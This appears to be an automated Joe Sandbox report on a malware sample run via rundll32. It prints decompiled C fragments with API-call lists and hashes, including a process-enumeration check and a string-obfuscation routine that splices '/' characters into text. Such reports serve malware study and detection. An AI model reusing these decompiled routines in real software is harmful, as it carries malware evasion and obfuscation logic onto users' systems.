                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                          • String ID:
                                          • API String ID: 602384898-0
                                          • Opcode ID: aea3ae1caf2746b2f9a58499388945466dedd28023a9449bef5f7b093834cf4d
                                          • Instruction ID: cfe322ea613a83526fbb39a7f922ed72e98d1973bc1a8b5df3cb92869afd0021
                                          • Opcode Fuzzy Hash: aea3ae1caf2746b2f9a58499388945466dedd28023a9449bef5f7b093834cf4d
                                          • Instruction Fuzzy Hash: E23161B1E00308EFDB20DFE5C88499EB7B9EB08305F14496AD542E2140D736AA46DF54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD54AC, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 39%
                                          			E04FD54AC(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E04FD4F1F(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E04FD5749(_t23);
						}
					}
					return _t38;
				}
				if(E04FD9138(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x4fdd2a8, 1, 0,  *0x4fdd340);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E04FD9575(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E04FDA642(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E04FD568A(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E04FD72F2( &_v32, _t39);
					goto L13;
				}
			}












                                          0x04fd54ac
                                          0x04fd54b9
                                          0x04fd54bf
                                          0x04fd54c0
                                          0x04fd54c1
                                          0x04fd54c2
                                          0x04fd54c3
                                          0x04fd54c7
                                          0x04fd54d3
                                          0x04fd54d7
                                          0x04fd555f
                                          0x04fd555f
                                          0x04fd5562
                                          0x04fd5564
                                          0x04fd556c
                                          0x04fd5572
                                          0x04fd5575
                                          0x04fd5575
                                          0x04fd5572
                                          0x04fd5580
                                          0x04fd5580
                                          0x04fd54ea
                                          0x04fd54ec
                                          0x04fd54ec
                                          0x04fd5503
                                          0x04fd5507
                                          0x04fd550a
                                          0x04fd5515
                                          0x04fd551c
                                          0x04fd551c
                                          0x04fd5525
                                          0x04fd5529
                                          0x04fd5537
                                          0x04fd552b
                                          0x04fd552b
                                          0x04fd552c
                                          0x04fd552d
                                          0x04fd552e
                                          0x04fd552f
                                          0x04fd5530
                                          0x04fd5530
                                          0x04fd553c
                                          0x04fd553f
                                          0x04fd5543
                                          0x04fd5545
                                          0x04fd5545
                                          0x04fd554c
                                          0x00000000
                                          0x04fd554e
                                          0x04fd554e
                                          0x04fd555b
                                          0x00000000
                                          0x04fd555b

                                          APIs
                                          • CreateEventA.KERNEL32(04FDD2A8,00000001,00000000,00000040,?,?,7519F710,00000000,7519F730), ref: 04FD54FD
                                          • SetEvent.KERNEL32(00000000), ref: 04FD550A
                                          • Sleep.KERNEL32(00000BB8), ref: 04FD5515
                                          • CloseHandle.KERNEL32(00000000), ref: 04FD551C
                                            • Part of subcall function 04FD9575: WaitForSingleObject.KERNEL32(00000000,?,?,?,04FD553C,?,04FD553C,?,?,?,?,?,04FD553C,?), ref: 04FD964F
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                          • String ID:
                                          • API String ID: 2559942907-0
                                          • Opcode ID: 37d7a7ec63555b5695c777aa7ed04b364fa3c179f65b7b78ea9746842f7162f1
                                          • Instruction ID: 6ef452513077944690689aebbde4eec59d689fc3f48512ee8f99bc12a9e300ec
                                          • Opcode Fuzzy Hash: 37d7a7ec63555b5695c777aa7ed04b364fa3c179f65b7b78ea9746842f7162f1
                                          • Instruction Fuzzy Hash: 65218073D00119BBDB11BFF4D884AAEB7ABEF44358F094425EA12E7100D674BA028B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD4858, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E04FD4858(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x4fdd238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x4fdd250; // 0x82e8f92b
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x4fdd250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                          0x04fd4860
                                          0x04fd4863
                                          0x04fd4869
                                          0x04fd4881
                                          0x04fd4883
                                          0x04fd4888
                                          0x04fd488a
                                          0x04fd488d
                                          0x04fd488f
                                          0x04fd4892
                                          0x04fd4894
                                          0x04fd4894
                                          0x04fd4896
                                          0x04fd48a1
                                          0x04fd48a6
                                          0x04fd48b7
                                          0x04fd48bf
                                          0x04fd48c4
                                          0x04fd48c7
                                          0x04fd48ca
                                          0x04fd48cc
                                          0x04fd48cf
                                          0x04fd48d2
                                          0x04fd48d2
                                          0x04fd48d5
                                          0x04fd48e0
                                          0x04fd48e5
                                          0x04fd48ef

                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04FD4DBF,00000000,?,?,04FD52FE,?,075295B0), ref: 04FD4863
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04FD487B
                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04FD4DBF,00000000,?,?,04FD52FE,?,075295B0), ref: 04FD48BF
                                          • memcpy.NTDLL(00000001,?,00000001), ref: 04FD48E0
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0
                                          • Opcode ID: 44a203eef70bf661de1c744c88044785ff722a55960ede038568e46aa966a1d9
                                          • Instruction ID: a1b581c90e4bca4ca816f6a515b330c4c2247e9d156bc8b8a4b92341017dedad
                                          • Opcode Fuzzy Hash: 44a203eef70bf661de1c744c88044785ff722a55960ede038568e46aa966a1d9
                                          • Instruction Fuzzy Hash: 9911C672A01158AFD710CE69EC88D9EBBEFEB90391B090176F504D7140E774DE01D760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD6AF7, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 53%
                                          			E04FD6AF7(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E04FD6F89(_t8, _t1);
				_t16 = E04FD58BE(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E04FD9038(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E04FD58BE(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E04FD147E(_t16);
				}
				return _t18;
			}









                                          0x04fd6b02
                                          0x04fd6b03
                                          0x04fd6b06
                                          0x04fd6b08
                                          0x04fd6b13
                                          0x04fd6b17
                                          0x04fd6b1c
                                          0x04fd6b20
                                          0x04fd6b28
                                          0x04fd6b2d
                                          0x04fd6b35
                                          0x04fd6b35
                                          0x04fd6b3e
                                          0x04fd6b42
                                          0x04fd6b48
                                          0x04fd6b4b
                                          0x04fd6b51
                                          0x04fd6b51
                                          0x04fd6b59
                                          0x04fd6b59
                                          0x04fd6b60
                                          0x04fd6b60
                                          0x04fd6b6b

                                          APIs
                                            • Part of subcall function 04FD58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04FD1C51), ref: 04FD58CA
                                            • Part of subcall function 04FD9038: wsprintfA.USER32 ref: 04FD9094
                                          • lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,04FD2098,74666F53,00000000,?,04FDD00C,?,?), ref: 04FD6B2D
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04FD6B51
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 04FD6B59
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                          • String ID: Soft
                                          • API String ID: 393707159-3753413193
                                          • Opcode ID: 4b7c26d89c6f4e1e522ab5d9d6eefe9ceb663456e89cff7aed8c7edb3bb3ff52
                                          • Instruction ID: eaea61e6a7c26163d8397693c8c9fa79b2ab0fb83ce8d18c81a66e5d042a9c6d
                                          • Opcode Fuzzy Hash: 4b7c26d89c6f4e1e522ab5d9d6eefe9ceb663456e89cff7aed8c7edb3bb3ff52
                                          • Instruction Fuzzy Hash: 8901A272501209BBEB123BB89C88EEF3B6EDF85345F084024FA049A101DB789946C7A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD56A2, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E04FD56A2() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x4fdd2a4; // 0x254a5a8
						_t2 = _t9 + 0x4fdee38; // 0x73617661
						_push( &_v264);
						if( *0x4fdd0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                          0x04fd56ad
                                          0x04fd56b7
                                          0x04fd56bb
                                          0x04fd56c5
                                          0x04fd56f6
                                          0x04fd56cc
                                          0x04fd56d1
                                          0x04fd56de
                                          0x04fd56e7
                                          0x04fd56fe
                                          0x04fd56e9
                                          0x04fd56f1
                                          0x00000000
                                          0x04fd56f1
                                          0x04fd56ff
                                          0x04fd5700
                                          0x00000000
                                          0x04fd5700
                                          0x00000000
                                          0x04fd56fa
                                          0x04fd5706
                                          0x04fd570b

                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04FD56B2
                                          • Process32First.KERNEL32(00000000,?), ref: 04FD56C5
                                          • Process32Next.KERNEL32(00000000,?), ref: 04FD56F1
                                          • CloseHandle.KERNEL32(00000000), ref: 04FD5700
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 420147892-0
                                          • Opcode ID: d51e6ae0e01c7fe566681824d1ea89ae3bebfd2646a48e26c563b90e85e494e3
                                          • Instruction ID: 262e989ee35c8af06a03987eeb77bdcec0f60706ba31873fe9cf37a6474b9daa
                                          • Opcode Fuzzy Hash: d51e6ae0e01c7fe566681824d1ea89ae3bebfd2646a48e26c563b90e85e494e3
                                          • Instruction Fuzzy Hash: E8F02B72A0102CBBF720BA369C08DEF76AFDFC5344F080151E915C3040F624E94786B4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD7283, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04FD7283(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                                          0x04fd728d
                                          0x04fd7291
                                          0x04fd72a6
                                          0x04fd72a8
                                          0x04fd72ad
                                          0x04fd72b3
                                          0x04fd72b5
                                          0x04fd72ba
                                          0x04fd72c5
                                          0x04fd72bc
                                          0x04fd72bc
                                          0x04fd72bc
                                          0x04fd72ba
                                          0x04fd72d3

                                          APIs
                                          • memset.NTDLL ref: 04FD7291
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,751881D0), ref: 04FD72A6
                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 04FD72B3
                                          • CloseHandle.KERNEL32(?), ref: 04FD72C5
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: CreateEvent$CloseHandlememset
                                          • String ID:
                                          • API String ID: 2812548120-0
                                          • Opcode ID: ae2c30e77b7fcd7b724962503b2bf7a04e6e7bfc848c909c70189986ce620d02
                                          • Instruction ID: 06f720028780d9f72af1d50775e87767814b61d003379e530d59aa2dec764b35
                                          • Opcode Fuzzy Hash: ae2c30e77b7fcd7b724962503b2bf7a04e6e7bfc848c909c70189986ce620d02
                                          • Instruction Fuzzy Hash: B1F05EB150534CBFD310AF66DCC4C2BBBEDEB51299B15892EF14282101D676A8158E70
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FDA2EF, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 33stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E04FDA2EF(int __eax, char _a4) {
				void* _v0;
				void* _t12;
				int _t13;
				int _t14;

				_t1 =  &_a4; // 0x4d283a53
				_t14 = __eax;
				__imp__( *_t1);
				_t13 = __eax;
				if(__eax > __eax) {
					_t14 = __eax;
				}
				_t2 = _t14 + 1; // 0x1
				_t12 = E04FD58BE(_t2);
				if(_t12 != 0) {
					memcpy(_t12, _v0, _t13);
					memset(_t12 + _t13, 0, _t14 - _t13 + 1);
				}
				return _t12;
			}







                                          0x04fda2f2
                                          0x04fda2f6
                                          0x04fda2f8
                                          0x04fda2fe
                                          0x04fda302
                                          0x04fda304
                                          0x04fda304
                                          0x04fda306
                                          0x04fda30f
                                          0x04fda313
                                          0x04fda31b
                                          0x04fda32a
                                          0x04fda32f
                                          0x04fda337

                                          APIs
                                          • lstrlen.KERNEL32(S:(M,00000000,7748D3B0,?,04FD9AA8,00000000,00000005,04FDD00C,00000008,?,?,59935A40,?,?,59935A40), ref: 04FDA2F8
                                          • memcpy.NTDLL(00000000,?,00000000,00000001,?,?,?,04FD4A8B,?,?,?,4D283A53,?,?), ref: 04FDA31B
                                          • memset.NTDLL ref: 04FDA32A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemcpymemset
                                          • String ID: S:(M
                                          • API String ID: 4042389641-2217774225
                                          • Opcode ID: 803b7d59d14dfce1ca6ef3001c49e3be5d8acd7cfd99224762400d47c8760851
                                          • Instruction ID: e2afef7179d4b9b165e2ea48b5e40f0c79a37435aae14b7ee9cc904bb0021808
                                          • Opcode Fuzzy Hash: 803b7d59d14dfce1ca6ef3001c49e3be5d8acd7cfd99224762400d47c8760851
                                          • Instruction Fuzzy Hash: 44E0E573E053256BD730AAB95C8CD4F3A9FDBC4254B080835FE05C7204E631DC1582B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD78AD, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04FD78AD() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x4fdd26c; // 0x3d0
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x4fdd2b8; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x4fdd26c; // 0x3d0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x4fdd238; // 0x7130000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                          0x04fd78ad
                                          0x04fd78b4
                                          0x04fd78fe
                                          0x04fd7900
                                          0x04fd7900
                                          0x04fd78b8
                                          0x04fd78be
                                          0x04fd78c3
                                          0x04fd78c7
                                          0x04fd78cd
                                          0x04fd78d4
                                          0x00000000
                                          0x00000000
                                          0x04fd78d6
                                          0x04fd78db
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04fd78db
                                          0x04fd78dd
                                          0x04fd78e5
                                          0x04fd78e8
                                          0x04fd78e8
                                          0x04fd78ee
                                          0x04fd78f5
                                          0x04fd78f8
                                          0x04fd78f8
                                          0x00000000

                                          APIs
                                          • SetEvent.KERNEL32(000003D0,00000001,04FD6F2D), ref: 04FD78B8
                                          • SleepEx.KERNEL32(00000064,00000001), ref: 04FD78C7
                                          • CloseHandle.KERNEL32(000003D0), ref: 04FD78E8
                                          • HeapDestroy.KERNEL32(07130000), ref: 04FD78F8
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: CloseDestroyEventHandleHeapSleep
                                          • String ID:
                                          • API String ID: 4109453060-0
                                          • Opcode ID: 3c500307690736fb423c0ec55d37741e409348269ec23713045d6967fa5f56aa
                                          • Instruction ID: 92bfd5a7ced32ffddc531525010790d87062ab551a9e130859e45f1ee11339d4
                                          • Opcode Fuzzy Hash: 3c500307690736fb423c0ec55d37741e409348269ec23713045d6967fa5f56aa
                                          • Instruction Fuzzy Hash: 64F03071E073599BEB107E75BD4CB067BDBEB05B527280624BC00DB280CB38EC01D660
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD4C3A, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 50%
                                          			E04FD4C3A(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x4fdd324; // 0x75295b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x4fdd324; // 0x75295b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x4fdd030) {
					HeapFree( *0x4fdd238, 0, _t8);
				}
				_t14[1] = E04FD7C75(_v0, _t14);
				_t11 =  *0x4fdd324; // 0x75295b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}










                                          0x04fd4c3a
                                          0x04fd4c3a
                                          0x04fd4c43
                                          0x04fd4c53
                                          0x04fd4c53
                                          0x04fd4c58
                                          0x04fd4c5d
                                          0x00000000
                                          0x00000000
                                          0x04fd4c4d
                                          0x04fd4c4d
                                          0x04fd4c5f
                                          0x04fd4c63
                                          0x04fd4c75
                                          0x04fd4c75
                                          0x04fd4c85
                                          0x04fd4c88
                                          0x04fd4c8d
                                          0x04fd4c91
                                          0x04fd4c97

                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(07529570), ref: 04FD4C43
                                          • Sleep.KERNEL32(0000000A,?,?,?,04FD4A8B,?,?,?,4D283A53,?,?), ref: 04FD4C4D
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,04FD4A8B,?,?,?,4D283A53,?,?), ref: 04FD4C75
                                          • RtlLeaveCriticalSection.NTDLL(07529570), ref: 04FD4C91
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          • Opcode ID: 28f7de48c3042a32c9bfeaf7c9bdd0ab152bcd07ee83b32594cb210abdf866d9
                                          • Instruction ID: e69e539ac45aa5a674b274be65f22f02767b9eef8f6d5fbec4a9e9ae95c6f8d4
                                          • Opcode Fuzzy Hash: 28f7de48c3042a32c9bfeaf7c9bdd0ab152bcd07ee83b32594cb210abdf866d9
                                          • Instruction Fuzzy Hash: BFF0FE71A022449BE710AF78FA4CF157BEAEF15744B084504F506D7250D738FC42CB19
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD9B10, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E04FD9B10() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x4fdd324; // 0x75295b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x4fdd324; // 0x75295b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x4fdd324; // 0x75295b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x4fde845) {
					HeapFree( *0x4fdd238, 0, _t10);
					_t7 =  *0x4fdd324; // 0x75295b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                          0x04fd9b10
                                          0x04fd9b19
                                          0x04fd9b29
                                          0x04fd9b29
                                          0x04fd9b2e
                                          0x04fd9b33
                                          0x00000000
                                          0x00000000
                                          0x04fd9b23
                                          0x04fd9b23
                                          0x04fd9b35
                                          0x04fd9b3a
                                          0x04fd9b3e
                                          0x04fd9b51
                                          0x04fd9b57
                                          0x04fd9b57
                                          0x04fd9b60
                                          0x04fd9b62
                                          0x04fd9b66
                                          0x04fd9b6c

                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(07529570), ref: 04FD9B19
                                          • Sleep.KERNEL32(0000000A,?,?,?,04FD4A8B,?,?,?,4D283A53,?,?), ref: 04FD9B23
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,04FD4A8B,?,?,?,4D283A53,?,?), ref: 04FD9B51
                                          • RtlLeaveCriticalSection.NTDLL(07529570), ref: 04FD9B66
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          • Opcode ID: 0ee9807e2c3e40d66f898ebf360ac718f708cdf3107855dc1a725aa24afc818a
